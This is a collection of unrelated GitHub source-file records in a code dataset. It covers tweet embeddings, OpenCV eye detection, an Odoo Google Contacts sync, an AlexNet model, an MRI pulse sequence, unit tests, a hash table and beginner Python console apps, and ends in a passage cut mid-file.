vector representing out-of-vocabulary words, with shape (EMBEDDING_DIM,)\n Parameters:\n vocab (list of str): vocab[i] is the word i\n xs (np.ndarray): x embedding with shape (VOCAB_SIZE, X_EMBEDDING_DIM)\n ys (np.ndarray): y embedding\n method (\"mean\" or \"raw\"): method to use for embedding tweets\n \"\"\"\n def __init__(self, vocab, xs, ys, method):\n self.vocab = vocab\n self.xs = xs\n self.ys = ys\n assert method in [\"mean\", \"raw\"]\n self.method = method\n \n self.word_to_index = {}\n for i in range(len(vocab)):\n self.word_to_index[vocab[i]] = i\n\n self.xys = np.concatenate((xs, ys), axis=1)\n self.VOCAB_SIZE = len(vocab)\n self.X_EMBEDDING_DIM = xs.shape[1]\n self.EMBEDDING_DIM = 2*xs.shape[1]\n\n self.oov_vector = np.zeros((self.EMBEDDING_DIM,)) # TODO: maybe use a different policy for unknown words\n\n def embed(self, tweet):\n if self.method == \"mean\":\n return self.embed_tweet_by_mean_vector(tweet)\n elif self.method == \"raw\":\n return self.embed_tweet_by_padded_concat(tweet)\n else: raise ValueError(\"method should be 'mean' or 'raw'\")\n\n def embed_tweet_by_mean_vector(self, tweet):\n \"\"\"Represent the tweet by the mean of its word embeddings\n Returns: \n embedded_tweet (np.ndarray): with shape (EMBEDDING_DIM,)\n \"\"\"\n l = [ self.xys[self.word_to_index[word]] if word in self.vocab else self.oov_vector for word in tweet ]\n return np.mean(np.array(l), axis=0)\n\n def embed_tweet_by_padded_concat(self, tweet, max_tweet_length=30, pad_mode=0.):\n \"\"\"Represent the tweet by the concatenation of its word embeddings (\"raw\" embedding)\n - If tweet is longer than max_tweet_length, truncate it\n - If tweet is shorter than max_tweet_length, pad with pad_mode (by default, 0's)\n Rk: this method can be really heavy and is mainly there for convenience and testing\n Args:\n pad_mode (str or function or float): the padding mode for https://numpy.org/doc/stable/reference/generated/numpy.pad.html\n if float, pad with constant value (over all dimensions of the embedding)\n Returns:\n embedded_tweet (np.ndarray): with shape (EMBEDDING_DIM*max_tweet_length,)\n \"\"\"\n l = [ self.xys[self.word_to_index[word]] if word in self.vocab else self.oov_vector for word in tweet ]\n concated = np.concatenate(np.array(l), axis=1)\n if len(tweet) < max_tweet_length:\n diff = self.EMBEDDING_DIM*( max_tweet_length-len(tweet) )\n if isinstance(pad_mode, str):\n concated = np.pad(concated, (0,diff), mode=pad_mode)\n elif isinstance(pad_mode, (int, float)):\n concated = np.pad(concated, (0,diff), constant_values=pad_mode)\n else: raise ValueError\n assert concated.shape == (max_tweet_length*self.EMBEDDING_DIM,)\n return concated\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cmimprota/CSR","sub_path":"algorithms/fresh_glove_embedding/embed_tweets.py","file_name":"embed_tweets.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2277505931","text":"import cv2\n\nimg = cv2.imread(\"../../../../res/faces.jpeg\", cv2.IMREAD_COLOR)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\neyes_classifier = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n\neyes = eyes_classifier.detectMultiScale(gray, scaleFactor=1.20, minNeighbors=20, minSize=(10, 10))\nprint(len(eyes))\n\nfor (x, y, w, h) in eyes:\n cx = (x + x + w) / 2\n cy = (y + y + h) / 2\n cv2.circle(img, (int(cx), int(cy)), int(w / 2), (255, 0, 255), 4)\n\ncv2.imshow(\"Eyes\", img)\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"DastanIqbal/LearnOpenCV","sub_path":"src/LinkedInLearning/course/cv/04/eyes.py","file_name":"eyes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40342883464","text":"# PYTHON FUNCTION: It also allows source to repeat multiple times(iteration)\n\n# Stages of function:\n# 1.) Function declaration: def functionName(): [for a function without parameter] OR\n #def functionName(param_a, param_b): [for a function with parameter]\n# 2.) Function definition: print(\"I'm a function\")\n# 3.) Function invocation:\n\n# def parameter(): \n# print(\"I am a fuction\")\n# parameter()\n\n# Types of Function:\n# 1.) A Parameterized Function: Allows parameter or value(argument) in it \n# Example: \n# def print_name(name):\n# print('My name is', name)\n# print_name('Benjamin')\n\n# 2.) Non-parametized Function: Has no value(argument) in it\n# Example:\n# def parameter(): \n# print(\"I am a fuction\")\n# parameter()\n\n# Additon\ndef addition(add1, add2=1):\n add = add1 + add2\n print(add)\n# addition(10) \n\ndef addd(val1, val2):\n val = val1 + val2\n print(val)\n# addd(val1=(int(input('First Value: '))), val2=(int(input('Second Value: ')))) \n\n# def sum(val1=(int(input('First Value: '))), val2=(int(input('Second Value: ')))):\n# print(val1 + val2)\n# sum()\n\ndef addition(add1, add2=1):\n add = add1 + add2\n return add # return keeps the value while print displays the value\n# print('The sum is, ',addition(10))\n\nimport sys\ndef landingPage():\n print(\"\"\"\n WELCOME\n 1. Sign In \n 2. Sign Up\n 3. Exit\n \"\"\")\n user = (input(\"Choose an option: \"))\n user\n if user == \"1\":\n signIn()\n elif user == \"2\":\n signUp()\n elif user == \"3\":\n print('Terminated!')\n sys.exit() \n else:\n print('Invalid Input')\n landingPage() \n \n\ndef signIn():\n print(f\"\"\"\n SIGN IN OPTIONS \n 1. To continue\n 2. Haven't Gotten an account?\n 0. Back \n \"\"\") \n inp = (input(\"Choose Option: \"))\n if inp == '1':\n name = input('Enter your name: ') \n email = input('Email: ')\n phoneNumber = int(input('Phone Number: ')) \n print(f'''\n Welcome \n Name: {name.upper()} Email: {email.strip()} Phone Number: {phoneNumber}\n ''')\n signIn_Inner()\n elif inp == '2':\n signUp() \n elif inp == '0':\n landingPage()\n\ndef signIn_Inner():\n inp = input('How can we be of help to you? ')\n print(f\"\"\"\n Your request is {inp.capitalize()}.\\n\n Would get back later. Thank you.\n \"\"\")\ndef signUp(): \n print('''\n SIGN UP OPTIONS\n 1. To continue\n 2. For More Inquiry\n 3. Menu\n 00. Exit\n ''')\n inp2 = (input(\"Choose Option: \"))\n if inp2 == '1':\n print(\"\"\"\n You are welcome\n 1. To enter your details\n 0. Back\n \"\"\")\n inp2 = (input(\"Choose Option: \"))\n if inp2 == '1':\n name = input('Enter your name: ') \n email = input('Email: ')\n phoneNumber = int(input('Phone Number: ')) \n gender = input('Gender: ')\n marital = input('Marital Status: ')\n age = int(input('Age: '))\n print(f'''\n Welcome \n Name: {name.upper()} Email: {email.strip()} Phone Number: {phoneNumber}\n Gender: {gender.capitalize()} Marital Status: {marital.capitalize()} Age: {age}\n ''')\n print('Press any key to continue and 00 to exit')\n inp3 = (input(\"Choose Option: \"))\n if inp3 == '00':\n print('Terminated!')\n sys.exit()\n else:\n signIn_Inner() \n\n elif inp2 == '2':\n print(\"Error\") \n sys.exit\n elif inp2 == '3':\n landingPage() \n elif inp2 == '00': \n print('Exit')\n sys.exit\n else:\n print('Invalid Input!')\n signUp()\n\ndef signUp_Inner():\n pass \nlandingPage()\n\n\n# RECCURSSIVE FUNCTION:\n","repo_name":"Bentimi/Assignment","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18607242384","text":"\"\"\"\nFisher's noncentral hypergeometric distribution\n\nhttps://en.wikipedia.org/wiki/Fisher%27s_noncentral_hypergeometric_distribution\n\n\"\"\"\n__all__ = ['fisher']\n\nfrom math import gamma\n\ndef fisher(x, m, n):\n \"\"\"\n x = 1\nm = 0\nn = 1\npdf = fisher_distribution(x, m, n)\nprint(\"PDF of the Fisher distribution with m={}, n={} at x={}: {}\".format(m, n, x, pdf))\n\n \"\"\"\n num = gamma((n + 1) / 2) * ((x - m) ** ((n - 1) / 2))\n den = (gamma(n / 2) * ((n * 3.14159265358979323846) ** 0.5) * (1 + ((x - m) ** 2 / n)) ** ((n + 1) / 2))\n return num / den\n","repo_name":"Mdslauddin/scistats-main","sub_path":"scistats/probability/discrete/_fisher.py","file_name":"_fisher.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38091716696","text":"import torch\nimport functools\nimport os.path as osp\nfrom PIL import Image\nfrom torch.utils.data import Dataset\n\n\ndef read_image(img_path):\n \"\"\"Keep reading image until succeed.\n This can avoid IOError incurred by heavy IO process.\"\"\"\n got_img = False\n if not osp.exists(img_path):\n raise IOError(\"{} does not exist\".format(img_path))\n while not got_img:\n try:\n img = Image.open(img_path).convert('RGB')\n got_img = True\n except IOError:\n print(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n pass\n return img\n\n\nclass ImageDataset(Dataset):\n \"\"\"Image Person ReID Dataset\"\"\"\n def __init__(self, dataset, transform=None):\n self.dataset = dataset\n self.transform = transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, index):\n img_path, pid, camid, clothes_id = self.dataset[index]\n img = read_image(img_path)\n if self.transform is not None:\n img = self.transform(img)\n return img, pid, camid, clothes_id, img_path\n\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n with Image.open(f) as img:\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n try:\n import accimage\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef get_default_image_loader():\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader\n else:\n return pil_loader\n\n\ndef image_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n","repo_name":"bar371/ReFace","sub_path":"ReIDModules/AIM_CCReID/data/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"40476675987","text":"import logging\nimport requests\nfrom odoo import fields, models, _\nfrom odoo.exceptions import ValidationError\n\n_logger = logging.getLogger(__name__)\n\nTIMEOUT = 20\n\n\nclass ResPartner(models.Model):\n \"\"\"Inherit res_partner for integrating contacts with Google\"\"\"\n _inherit = 'res.partner'\n\n google_resource = fields.Char('Google Contact Id',\n help='Contact Unique identifier', readonly=True)\n google_etag = fields.Char(\n 'Google Etag', help='Contact Version control key', readonly=True)\n first_name = fields.Char(\n 'First Name', help='Enter the first name of the person.')\n last_name = fields.Char(\n 'Last Name', help='Enter the last name of the person.')\n\n def action_export_google_contacts(self):\n \"\"\"Export Contacts FROM Google TO ODOO\"\"\"\n current_uid = self._context.get('uid')\n user_id = self.env['res.users'].browse(current_uid)\n company_id = user_id.company_id\n partner_ids = self.env['res.partner'].sudo().browse(\n self.env.context.get('active_ids'))\n for partner in partner_ids:\n header = {\n 'Authorization':\n f'Bearer {company_id.contact_company_access_token}',\n 'Content-Type': 'application/json'\n }\n contact_payload = {\n 'names': [\n {\n 'givenName': partner.first_name or partner.name,\n 'familyName': partner.last_name or ''\n }\n ],\n 'emailAddresses': [\n {\n 'value': partner.email or '',\n 'type': 'work'\n }\n ],\n 'phoneNumbers': [\n {\n 'value': partner.phone or '',\n 'type': 'work'\n }\n ],\n 'addresses': [\n {\n 'streetAddress': partner.street or '',\n 'city': partner.city or '',\n 'region': partner.state_id.name or '',\n 'postalCode': partner.zip or '',\n 'country': partner.country_id.name or '',\n 'type': 'work'\n }\n ],\n 'organizations': [\n {\n 'name': partner.company_id.name or '',\n 'title': partner.title or '',\n 'type': 'work'\n }\n ]\n }\n if partner.google_etag:\n contact_resource_name = partner.google_resource\n contact_payload['resourceName'] = contact_resource_name\n contact_payload['etag'] = partner.google_etag\n url = (\n f\"https://people.googleapis.com/v1/{contact_resource_name}:updateContact?\"\n \"updatePersonFields=emailAddresses,names,phoneNumbers,\"\n \"addresses,organizations,userDefined&\"\n \"prettyPrint=false\"\n )\n response = requests.patch(url, headers=header,\n json=contact_payload)\n if response.status_code == 200:\n partner.write({\n 'google_resource': response.json().get('resourceName'),\n 'google_etag': response.json().get('etag')\n })\n _logger.info(\"Contact updated successfully!\")\n else:\n error_message = f\"Failed to update contact. Error: {response.text}\"\n raise ValidationError(error_message)\n else:\n url = 'https://people.googleapis.com/v1/people:createContact'\n result = requests.post(url, headers=header,\n json=contact_payload)\n if result.status_code == 200:\n partner.write({\n 'google_resource': result.json().get('resourceName'),\n 'google_etag': result.json().get('etag')\n })\n _logger.info(\"Contact exported successfully!\")\n else:\n error_message = f\"Failed to export contact. Error: {result.text}\"\n raise ValidationError(error_message)\n\n def action_delete_google_contact(self):\n \"\"\"Deleting a contact from Google Contacts\"\"\"\n current_uid = self._context.get('uid')\n user_id = self.env['res.users'].browse(current_uid)\n company_id = user_id.company_id\n partner_ids = self.env['res.partner'].sudo().browse(\n self.env.context.get('active_ids'))\n for partner in partner_ids:\n contact_resource_name = partner.google_resource\n if not contact_resource_name:\n _logger.warning(\n \"Partner %s does not have a Google contact resource name.\",\n partner.name)\n continue\n url = f\"https://people.googleapis.com/v1/{contact_resource_name}:deleteContact\"\n headers = {\n 'Authorization': f'Bearer {company_id.contact_company_access_token}',\n 'Content-Type': 'application/json'\n }\n response = requests.delete(url, headers=headers)\n if response.status_code == 200:\n _logger.info(\"Contact deleted successfully!\")\n partner.google_resource = ''\n partner.google_etag = ''\n partner.unlink()\n elif response.status_code == 404:\n _logger.warning(\n \"Contact not found in Google. Removing local reference.\")\n partner.google_resource = ''\n partner.google_etag = ''\n else:\n error_message = f\"Failed to delete contact. Error: {response.text}\"\n raise ValidationError(error_message)\n","repo_name":"CybroOdoo/CybroAddons","sub_path":"odoo_google_contact_integration/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"52"} +{"seq_id":"16375981453","text":"import tensorflow\r\n\r\ndef alex_net(input_shape=(200, 200, 1), number_of_classes=3, optimizer='adam'):\r\n layers = tensorflow.keras.layers\r\n Model = tensorflow.keras.models.Model\r\n\r\n input_layer = layers.Input(input_shape)\r\n conv1 = layers.Conv2D(96, 11, strides=4, activation='relu')(input_layer)\r\n pool1 = layers.MaxPool2D(3, 2)(conv1)\r\n\r\n conv2 = layers.Conv2D(256, 5, strides=1, padding='same', activation='relu')(pool1)\r\n pool2 = layers.MaxPool2D(3, 2)(conv2)\r\n\r\n conv3 = layers.Conv2D(384, 3, strides=1, padding='same', activation='relu')(pool2)\r\n conv4 = layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(conv3)\r\n pool3 = layers.MaxPool2D(3, 2)(conv4)\r\n\r\n flattened = layers.Flatten()(pool3)\r\n dense1 = layers.Dense(4096, activation='relu')(flattened)\r\n drop1 = layers.Dropout(0.5)(dense1)\r\n dense2 = layers.Dense(4096, activation='relu')(drop1)\r\n drop2 = layers.Dropout(0.5)(dense2)\r\n\r\n preds = layers.Dense(number_of_classes, activation='softmax')(drop2)\r\n\r\n model = Model(input_layer, preds)\r\n model.compile(\r\n loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']\r\n )\r\n\r\n return model","repo_name":"AbdulAhadKhan/fetal-biometry-detection","sub_path":"AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8570916945","text":"import math\n\nimport numpy as np\n\nfrom pypulseq.Sequence.sequence import Sequence\nfrom pypulseq.calc_duration import calc_duration\nfrom pypulseq.make_adc import make_adc\nfrom pypulseq.make_delay import make_delay\nfrom pypulseq.make_sinc_pulse import make_sinc_pulse\nfrom pypulseq.make_trap_pulse import make_trapezoid\nfrom pypulseq.opts import Opts\n\nseq = Sequence()\nfov = 250e-3\nNx = 256\nNy = 256\nalpha = 10\nslice_thickness = 3e-3\nTE = np.array([7.38, 9.84]) * 1e-3\nTR = 100e-3\n\nrf_spoiling_inc = 117\n\nsys = Opts(max_grad=28, grad_unit='mT/m', max_slew=150, slew_unit='T/m/s', rf_ringdown_time=20e-6, rf_dead_time=100e-6,\n adc_dead_time=10e-6)\n\nrf, gz, gzr = make_sinc_pulse(flip_angle=alpha * math.pi / 180, duration=4e-3, slice_thickness=slice_thickness,\n apodization=0.5, time_bw_product=4, system=sys)\n\ndelta_k = 1 / fov\ngx = make_trapezoid(channel='x', flat_area=Nx * delta_k, flat_time=6.4e-3, system=sys)\nadc = make_adc(num_samples=Nx, duration=gx.flat_time, delay=gx.rise_time, system=sys)\ngx_pre = make_trapezoid(channel='x', area=-gx.area / 2, duration=2e-3, system=sys)\ngz_reph = make_trapezoid(channel='z', area=-gz.area / 2, duration=2e-3, system=sys)\nphase_areas = (np.arange(Ny) - Ny / 2) * delta_k\n\ngx_spoil = make_trapezoid(channel='x', area=2 * Nx * delta_k, system=sys)\ngz_spoil = make_trapezoid(channel='z', area=4 / slice_thickness, system=sys)\n\ndelay_TE = np.ceil((TE - calc_duration(gx_pre) - gz.fall_time - gz.flat_time / 2 - calc_duration(\n gx) / 2) / seq.grad_raster_time) * seq.grad_raster_time\ndelay_TR = np.ceil((TR - calc_duration(gx_pre) - calc_duration(gz) - calc_duration(\n gx) - delay_TE) / seq.grad_raster_time) * seq.grad_raster_time\n\nassert np.all(delay_TR >= calc_duration(gx_spoil, gz_spoil))\n\nrf_phase = 0\nrf_inc = 0\n\nfor i in range(Ny):\n for j in range(len(TE)):\n rf.phase_offset = rf_phase / 180 * np.pi\n adc.phase_offset = rf_phase / 180 * np.pi\n rf_inc = divmod(rf_inc + rf_spoiling_inc, 360.0)[1]\n rf_phase = divmod(rf_phase + rf_inc, 360.0)[1]\n\n seq.add_block(rf, gz)\n gy_pre = make_trapezoid(channel='y', area=phase_areas[i], duration=2e-3, system=sys)\n seq.add_block(gx_pre, gy_pre, gz_reph)\n seq.add_block(make_delay(delay_TE[j]))\n seq.add_block(gx, adc)\n gy_pre.amplitude = -gy_pre.amplitude\n seq.add_block(make_delay(delay_TR[j]), gx_spoil, gy_pre, gz_spoil)\n\nreport = seq.test_report()\nprint(report)\nseq.calculate_kspace()\nseq.plot()\nseq.write('gre_pypulseq.seq')\n","repo_name":"skye789/MRI-Sequence-Programming","sub_path":"MRTwin_pulseq-exercise/code/scannerloop_libs/pypulseq/seq_examples/write_gre.py","file_name":"write_gre.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27770426112","text":"import unittest\nimport biothings_explorer.utils.common as util\n\n\nclass TestUtilsCommon(unittest.TestCase):\n\n def test_add_s_when_input_is_non_integer(self):\n res = util.add_s('kevin')\n self.assertEqual(res, '')\n \n def test_add_s_when_input_is_greater_than_one(self):\n res = util.add_s(2)\n self.assertEqual(res, 's')\n\n def test_add_s_when_input_is_less_than_or_equal_to_one(self):\n res = util.add_s(1)\n self.assertEqual(res, '')\n res = util.add_s(0)\n self.assertEqual(res, '')\n \n def test_dict2listoftuples(self):\n py_dict = {'k': 'j', 'm': 'n'}\n res = util.dict2listoftuples(py_dict)\n # self.assertListEqual([('k', 'j'), ('m', 'n')], res)\n py_dict = {}\n res = util.dict2listoftuples(py_dict)\n self.assertListEqual([], res)\n\n def test_listoftuples2dict(self):\n lst = [('k', 'j'), ('m', 'n')]\n res = util.listoftuples2dict(lst)\n self.assertDictEqual(res, {'k': 'j', 'm': 'n'})\n lst = []\n res = util.listoftuples2dict(lst)\n self.assertDictEqual(res, {})\n\n def test_unlist(self):\n py_dict = {'k': ['n'], 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, {'k': 'n', 'm': 'q'})\n py_dict = {'k': ['n', 'm'], 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, py_dict)\n py_dict = {'k': {'m': ['n']}, 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, {'k': {'m': 'n'}, 'm': 'q'})\n py_dict = ['m']\n res = util.unlist(py_dict)\n self.assertEqual(res, 'm')\n py_dict = ['m', 'n']\n res = util.unlist(py_dict)\n self.assertEqual(res, ['m', 'n'])\n py_dict = 'm'\n res = util.unlist(py_dict)\n self.assertEqual(res, 'm')\n \n def test_find_longest_common_path(self):\n paths = ['ensembl.gene', 'ensembl.transcript']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n paths = ['ensembl.gene', 'protein']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, '')\n paths = ['ensembl.gene', 'ensembl.transcript', 'ensembl.protein.id']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n paths = ['ensembl.gene', 'ensembl.gid']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n\n def test_get_dict_values(self):\n py_dict = {'m': 'n', 'k': 'm', '@type': 'k', '$input': 'q'}\n res = util.get_dict_values(py_dict)\n self.assertSetEqual(set(res), set(['n', 'm']))\n res = util.get_dict_values(py_dict, excluded_keys=[])\n self.assertSetEqual(set(res), set(['n', 'm', 'k', 'q']))\n\n def test_get_primary_id_from_equivalent_ids(self):\n equivalent_ids = {'entrez': ['1017'],\n 'ensembl': ['ENSG1234'],\n 'symbol': ['CDK7'],\n 'umls': ['C001234']}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, 'entrez:1017')\n equivalent_ids = {'kk': ['123']}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, 'kk:123')\n equivalent_ids = {}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, '')\n\n def test_get_name_from_equivalent_ids(self):\n equivalent_ids = {'NCBIGene': ['1017'],\n 'ENSEMBL': ['ENSG1234'],\n 'SYMBOL': ['CDK7'],\n 'UMLS': ['C001234']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'CDK7')\n equivalent_ids = {'name': ['Lung Cancer'], 'MONDO': ['MONDO:00023']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'Lung Cancer')\n equivalent_ids = {'MONDO': ['MONDO:000123']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'MONDO:000123')\n res = util.get_name_from_equivalent_ids({})\n self.assertEqual(res, 'unknown')\n res = util.get_name_from_equivalent_ids({}, 'kevin')\n self.assertEqual(res, 'kevin')\n\n def test_remove_prefix_flat_dict(self):\n json_doc = {'type': 'gene', \"@context\": \"http://schema.org\"}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': 'gene', \"@context\": \"http://schema.org\"})\n \n def test_remove_prefix_lst_of_dicts(self):\n json_doc = {'type': [{'name': 'gene'}, {'drug': 'carol'}]}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': [{'name': 'gene'},{'drug': 'carol'}]})\n\n def test_remove_prefix_int(self):\n json_doc = {'type': 1}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': 1})\n \n def test_remove_prefix_non_json(self):\n _input = 'gene'\n self.assertEqual(util.remove_prefix(_input, 'bts'), 'gene')\n _input = 12\n self.assertEqual(util.remove_prefix(_input, 'bts'), _input)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"biothings/biothings_explorer_archived","sub_path":"tests/test_utils_common.py","file_name":"test_utils_common.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"73208289124","text":"from data_structures_and_algorithms.data_structures.linked_list.linked_list import Node, LinkedList\n\nclass HashTable:\n def __init__(self, size=1024):\n self.map = [None] * size\n self.size = size\n self.current = None\n\n def hash(self, key):\n hashed_total = 0\n for char in key:\n hashed_total += ord(char)\n return hashed_total*19 % self.size\n\n def add(self, key, info):\n hashed_key = self.hash(key)\n contained = self.contains(key)\n if self.map[hashed_key] == None:\n self.map[hashed_key] = LinkedList()\n elif contained:\n self.current.info[1] = info\n return self.map[hashed_key].add((key, info))\n\n def get(self, key):\n hashed_key = self.hash(key)\n if self.map[hashed_key]:\n contained = self.contains(key)\n if contained:\n return self.current.info[1] \n return 'Not in the table'\n\n def contains(self, key):\n hashed_key = self.hash(key)\n if self.map[hashed_key]:\n self.current = self.map[hashed_key].head \n while self.current:\n if self.current.info[0] == key:\n return True\n self.current = self.current.next\n return False\n\nif __name__ == \"__main__\":\n table = HashTable()\n table.add('listen','listen value')\n table.add('silent','silent value')\n print(table.hash('listen'))\n print(table.map[table.hash('listen')].head.info[1])\n print(table.map[table.hash('silent')].head.next.info)\n print(table.get('listen'))\n print(table.get('listen'))\n print(table.get('silent'))\n print(table.get('speek'))\n print(table.contains('listen'))\n print(table.contains('silent'))\n print(table.contains('speek'))\n","repo_name":"Basma23/data-structures-and-algorithms-python","sub_path":"data_structures_and_algorithms/data_structures/hashtable/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43368646572","text":"comunidades='comunidades.csv'\r\nlog='login.csv'\r\ncad='cadastro.csv'\r\nimport csv\r\ndef inicio():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print('\\033[0;34mBem-vinda ao E-stuário\\033[m'.center(50))\r\n print('\\033[0;36m-\\033[m'*40)\r\n while True:\r\n resp_cad = input('Já possui Cadastro? [Sim/Não] \\n').upper()\r\n if resp_cad == 'SIM':\r\n login()\r\n feed_sim()\r\n eventos()\r\n comunidade()\r\n break\r\n elif resp_cad == 'NÃO' or resp_cad == 'NAO':\r\n cadastro()\r\n feed_nao()\r\n eventos()\r\n comunidade()\r\n break\r\n else:\r\n print('Digite uma resposta válida.')\r\n\r\ndef login():\r\n while True:\r\n email = input('Digite o seu email: ')\r\n senha = input('Digite sua senha: ')\r\n arquivo = open('cadastro.csv', 'r')\r\n linhas = arquivo.readlines()\r\n for linha in linhas:\r\n dados = linha.strip().split(',')\r\n if dados[2] == email and dados[3] == senha:\r\n print('\\033[4mLogin bem sucedido!\\033[m')\r\n arquivo.close()\r\n return\r\n print('\\033[4mEmail ou senha incorretos.\\033[m \\033[4mTente novamente.\\033[m')\r\n arquivo.close()\r\n\r\ndef cadastro():\r\n nome = ''\r\n sobrenome = ''\r\n email = ''\r\n senha = ''\r\n idd = ''\r\n while True:\r\n perfil = input('Seu perfil será pessoal ou uma comunidade? ').upper()\r\n if perfil == 'PESSOAL':\r\n while not nome:\r\n nome = input('Digite seu nome: ')\r\n while not sobrenome:\r\n sobrenome = input('Digite seu sobrenome: ')\r\n while not email:\r\n email = input('Digite o seu email: ')\r\n while not senha:\r\n senha = input('Crie sua senha: ')\r\n while not idd:\r\n idd = input('Digite a data do seu nascimento [DD/MM/AAAA]: ')\r\n while True:\r\n ocupacao = input('Qual sua ocupação: \\n-\\033[1m[1]\\033[m Estudante \\n-\\033[1m[2]\\033[m Profissional'\r\n ' \\n-\\033[1m[3]\\033[m Professor(a) \\n-\\033[1m[4]\\033[m Sem ocupação\\n--> ')\r\n if int(ocupacao) =='1' or int(ocupacao) =='2' or int(ocupacao) =='3' or int(ocupacao) =='4':\r\n print('Digite uma resposta válida.')\r\n else:\r\n break\r\n arquivo = open('cadastro.csv', 'a')\r\n arquivo.write(f'{nome},{sobrenome},{email},{senha},{idd},{ocupacao}\\n')\r\n arquivo.close()\r\n print('\\033[0;34mParabéns, você concluiu seu cadastro!\\033[m')\r\n break\r\n elif perfil == 'COMUNIDADE':\r\n nome = input('Digite o nome da comunidade: ')\r\n email = input('Digite o seu email: ')\r\n senha = input('Crie sua senha: ')\r\n arquivo = open('cadastro.csv', 'a')\r\n arquivo.write(f'{nome},{email},{senha}\\n')\r\n arquivo.close()\r\n print('\\033[0;34mParabéns, você concluiu o cadastro da comunidade!\\033[m')\r\n break\r\n else:\r\n print('Digite uma resposta válida.')\r\n break\r\n\r\ndef feed_sim():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print('\\033[4;34mHome\\033[m'.center(50))\r\n print()\r\n print('\\033[0;36m-\\033[m'*40)\r\n post()\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print()\r\n print('\\033[4;34mPublicação\\033[m'.center(50))\r\n print('\\n\\033[1;34m|\\033[mCurtir\\033[1;34m|\\033[mComentar\\033[1;34m|\\033[mCompartilhar\\033[1;34m|\\033[mRepublicar\\033[1;34m|\\033[m')\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n\r\ndef feed_nao():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print('\\033[4;34mHome\\033[m'.center(50))\r\n print()\r\n print('\\033[0;36m-\\033[m'*40)\r\n post()\r\n print('\\033[1m>Siga mais perfis para ver publicações<\\033[m')\r\n print()\r\n print('\\033[4;36mSugestões para seguir:\\033[m')\r\n print('\\033[0;34m*Perfis*\\n*Perfis*\\n*Perfis*\\033[m')\r\n print()\r\n\r\n\r\ndef post():\r\n criacao = ''\r\n while criacao != 'SIM' and criacao != 'NAO':\r\n criacao = input('Deseja publicar algo? [Sim/Não]\\n').strip().upper()\r\n if criacao == 'SIM':\r\n legenda = ''\r\n while not legenda:\r\n legenda = input('No que você está 